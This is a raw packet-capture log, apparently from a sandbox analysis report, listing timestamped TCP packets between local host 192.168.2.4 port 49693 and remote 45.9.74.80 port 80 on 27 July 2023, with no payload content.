Jul 27, 2023 20:19:00.366564989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366601944 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366626978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366669893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.366688013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366731882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366775036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.366816998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.367530107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367578030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367623091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367645979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.367679119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.367707968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367749929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367794037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367844105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367856026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.367891073 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.367916107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.367961884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.368016005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.368066072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.368079901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.368110895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.368145943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.368208885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.368252993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.368305922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.370569944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.371664047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.371685982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.371716022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.371740103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.371763945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.371788025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.371800900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.371822119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.372391939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372421980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372447014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372473001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.372483969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372502089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.372519970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372545958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372570038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372595072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372620106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372648001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372653961 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.372673988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.372688055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372711897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372735023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372759104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372780085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.372792959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372816086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.372828007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.374959946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.375163078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.375715971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.378072023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378103971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378129005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378156900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378165007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.378190041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378201008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.378228903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378253937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378271103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.378295898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378484011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378585100 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.378755093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378781080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.378856897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.378875971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.379601002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.379720926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.379745960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.379770994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.379786015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.379810095 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.379817963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.379842997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.379853010 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.379877090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.382138014 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389058113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389089108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389134884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389153957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389173031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389199972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389216900 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389240026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389259100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389271975 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389286995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389302969 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389313936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389333010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389359951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389377117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389390945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389404058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389421940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389431000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389448881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389455080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389472961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389492035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389498949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389516115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389524937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389540911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389559031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.389579058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.389684916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390624046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390642881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390661955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390681028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390698910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390707970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390727997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390746117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390757084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390772104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390790939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390799999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390808105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390825033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390844107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390861988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390881062 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390887976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390907049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390913963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390930891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390949965 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.390955925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.390976906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.391004086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.394155025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.394177914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.394196033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.394258022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.394618988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.394912004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.394931078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.394979954 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395023108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395041943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395067930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395178080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395196915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395221949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395243883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395263910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395284891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395292044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395311117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395320892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395338058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395355940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395375013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395395041 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395401955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395425081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395430088 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.395447969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.395471096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.397263050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.397286892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.397346973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.397357941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.397404909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.400389910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400473118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400496960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400521040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400548935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400557995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.400588036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.400902987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400928020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.400950909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.401120901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.401144981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.401174068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.401202917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.401247978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.402008057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.402046919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.402071953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.402096987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.402128935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.402163982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.404349089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.404376030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.404402971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.404443979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.404457092 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.404510021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.411860943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.411910057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.411942959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.411974907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412007093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412043095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412082911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412098885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412118912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412118912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412156105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412189007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412220955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412236929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412277937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412301064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412333012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412362099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412393093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412412882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412441015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412450075 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412481070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412511110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412540913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.412554979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.412583113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413153887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413186073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413217068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413248062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413271904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413296938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413310051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413340092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413371086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413400888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413415909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413444996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413458109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413487911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413518906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413548946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413562059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413590908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413604021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413635015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413664103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413693905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413707018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413737059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413748980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.413778067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413808107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.413857937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.418447971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.418548107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.418678999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.418786049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.418819904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.418880939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.422343016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422393084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422432899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422476053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422504902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.422543049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422563076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.422609091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422621012 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.422662973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422723055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422765017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422785997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.422818899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.422838926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422879934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422919989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422959089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.422976971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.423006058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.423032999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423073053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423116922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423158884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423176050 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.423214912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.423233986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423275948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423317909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.423346043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.426661968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.426734924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.426779032 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.426842928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.426862955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.426898003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.427237034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.427279949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.427359104 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.427403927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.427444935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.427463055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.427503109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.427545071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.427603006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.428220034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.428277969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.428303957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.428347111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.428388119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.428462982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.430366039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.430412054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.430458069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.430502892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.430527925 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.438478947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.438554049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.438615084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.438704014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.438724995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.438781977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.438822031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.438882113 CEST	80	49693	45.9.74.80	192.168.2.4
